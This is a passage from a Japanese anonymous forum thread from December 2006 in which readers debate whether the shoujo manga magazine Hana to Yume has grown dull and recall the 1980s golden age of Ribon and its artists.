りぼんよりマシ

427 :花と名無しさん:2006/12/29(金) 13:20:33 ID:???0
もとが地味な雑誌だったけど
最近さらに地味になってきた?

428 :花と名無しさん:2006/12/29(金) 13:46:54 ID:???O
花ゆめが地味って…どこが?表紙デザインが垢抜けないなら、胴衣だが。

429 :花と名無しさん:2006/12/29(金) 13:48:14 ID:???0
なかよしよりマシ

430 :花と名無しさん:2006/12/29(金) 15:54:58 ID:???0
>>417
お前もなw

431 :花と名無しさん:2006/12/29(金) 16:23:32 ID:???0
花ゆめは贔屓目なく見たら間違いなく地味だよ。
フルバ終わって名前が有名な漫画一個もないし…。
つかアリスの地上波放送はもうちょっと反響あるかと思ったら大して変化なし。
大看板がない時点で雑誌には痛いだろうな。
ララにはホストがあるけど。

432 :花と名無しさん:2006/12/29(金) 16:26:19 ID:???0
>>429
なかよしやりぼんに「花ゆめよりマシ」といわれる時代が来たら泣く。
りぼんにだって黄金期があったんだよ…遠い過去の事みたいだけど。

433 :花と名無しさん:2006/12/29(金) 17:16:40 ID:???0
>>414
幸福なんて世間で話題になるどころか
ただの無名なマンガだと思うけど。
アニメ化とかしてないしコミクスも売れてないし。

まだアニメ化したアリスのが話題性あるんじゃない?

434 :花と名無しさん:2006/12/29(金) 17:37:37 ID:???0
りぼんの黄金期っていつだろう。
自分がリアのころ(1980年代・・・)は間違いなく
黄金期か準黄金期くらいだったと思うけど・・・

それでも自分より上世代には
「りぼんはもうダメ」とか思われてたのかな。


435 :花と名無しさん:2006/12/29(金) 18:04:24 ID:???0
花ゆめって地味な感じあるけど性コミと競ってるくらいの人気はあるんじゃなかったっけ?

436 :花と名無しさん:2006/12/29(金) 20:00:19 ID:???O
地味といえば花とゆめコミックスの装丁。本屋で新刊買うとき、
目の前にあるのに「どこ?」ってなる

437 :花と名無しさん:2006/12/29(金) 20:16:41 ID:???0
はなゆめ黄金期を知るママンに言わせると今は暗黒期でクズ雑誌なんだってさ
自分も読んでるのにそこまで言わなくても・・・・・orz

438 :花と名無しさん:2006/12/29(金) 21:14:48 ID:???O
習慣で買ってしまうのには高い雑誌だなー

439 :花と名無しさん:2006/12/29(金) 22:10:07 ID:???0
>>437
ママンは柄亀、スケバン時代ですか


440 :花と名無しさん:2006/12/29(金) 23:27:34 ID:???0
>>434
りぼんの黄金期は
一条ゆかり、萩岩睦美、本田恵子、小椋冬美、高橋由佳利、太刀掛秀子、池野恋
がいた頃、って勝手に言ってみた

441 :花と名無しさん:2006/12/29(金) 23:37:08 ID:???0
オマエラな、好き勝手に言ってんじゃないよ。
黄金期すらない雑誌だってあるんだから。
飽きた書店のアレとか。

442 :花と名無しさん:2006/12/29(金) 23:46:59 ID:???0
>434
同じ世代かな。自分がリア小の頃はりぼん派かなかよし派にわかれてた。
他の雑誌買ってる子なんていなかったけどね。今のりぼんってそんなにひどいのか。

443 :434:2006/12/29(金) 23:50:18 ID:???0
>>440,442
ナツカシスw

小椋冬美と太刀掛秀子はもういなかった。
岡田あーみんとさくらももことブレイク前の矢沢あいがいた。
1980年代ってどの少女漫画もそれなりに面白かったんじゃないかな。
読んでなかったけど白線系も面白い漫画そろってた頃だし。
1990年くらいがピークって言われてた気がする。

99 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)